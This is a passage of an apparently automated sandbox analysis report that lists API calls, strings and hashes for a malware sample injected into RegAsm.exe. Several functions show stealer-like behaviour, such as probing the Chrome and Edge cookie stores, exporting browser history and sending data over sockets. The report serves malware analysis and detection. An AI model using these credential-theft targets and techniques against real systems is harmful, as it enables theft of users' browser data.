                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                • _free.LIBCMT ref: 0044F43F
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                • String ID:
                                                                • API String ID: 336800556-0
                                                                • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                • _free.LIBCMT ref: 10005BB4
                                                                • _free.LIBCMT ref: 10005BDB
                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_free
                                                                • String ID:
                                                                • API String ID: 3170660625-0
                                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                • _free.LIBCMT ref: 00448353
                                                                • _free.LIBCMT ref: 0044837A
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free
                                                                • String ID:
                                                                • API String ID: 3170660625-0
                                                                • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                Function 0041C26E Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                • String ID:
                                                                • API String ID: 2951400881-0
                                                                • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$lstrcat
                                                                • String ID:
                                                                • API String ID: 493641738-0
                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 100091D0
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 100091E2
                                                                • _free.LIBCMT ref: 100091F4
                                                                • _free.LIBCMT ref: 10009206
                                                                • _free.LIBCMT ref: 10009218
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00450A54
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00450A66
                                                                • _free.LIBCMT ref: 00450A78
                                                                • _free.LIBCMT ref: 00450A8A
                                                                • _free.LIBCMT ref: 00450A9C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 1000536F
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 10005381
                                                                • _free.LIBCMT ref: 10005394
                                                                • _free.LIBCMT ref: 100053A5
                                                                • _free.LIBCMT ref: 100053B6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00444106
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00444118
                                                                • _free.LIBCMT ref: 0044412B
                                                                • _free.LIBCMT ref: 0044413C
                                                                • _free.LIBCMT ref: 0044414D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _strpbrk.LIBCMT ref: 0044E7B8
                                                                • _free.LIBCMT ref: 0044E8D5
                                                                  • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                                  • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                  • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                • String ID: *?$.
                                                                • API String ID: 2812119850-3972193922
                                                                • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,013E6988,00000010), ref: 004048E0
                                                                  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                • String ID: XQG$NG$PG
                                                                • API String ID: 1634807452-3565412412
                                                                • Opcode ID: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                • Opcode Fuzzy Hash: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                • _free.LIBCMT ref: 10004CE8
                                                                • _free.LIBCMT ref: 10004CF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                • API String ID: 2506810119-1068371695
                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                • _free.LIBCMT ref: 004435E0
                                                                • _free.LIBCMT ref: 004435EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                • API String ID: 2506810119-1068371695
                                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6BFB8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                                • API String ID: 368326130-3219657780
                                                                • Opcode ID: 72d71ca1ca92f56ac952f73673ea2402e26b1a6c877ca60da89600d4813981e8
                                                                • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                • Opcode Fuzzy Hash: 72d71ca1ca92f56ac952f73673ea2402e26b1a6c877ca60da89600d4813981e8
                                                                • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 00416330
                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen$CloseCreateValue
                                                                • String ID: !D@$okmode$PG
                                                                • API String ID: 3411444782-3370592832
                                                                • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                Strings
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                Strings
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
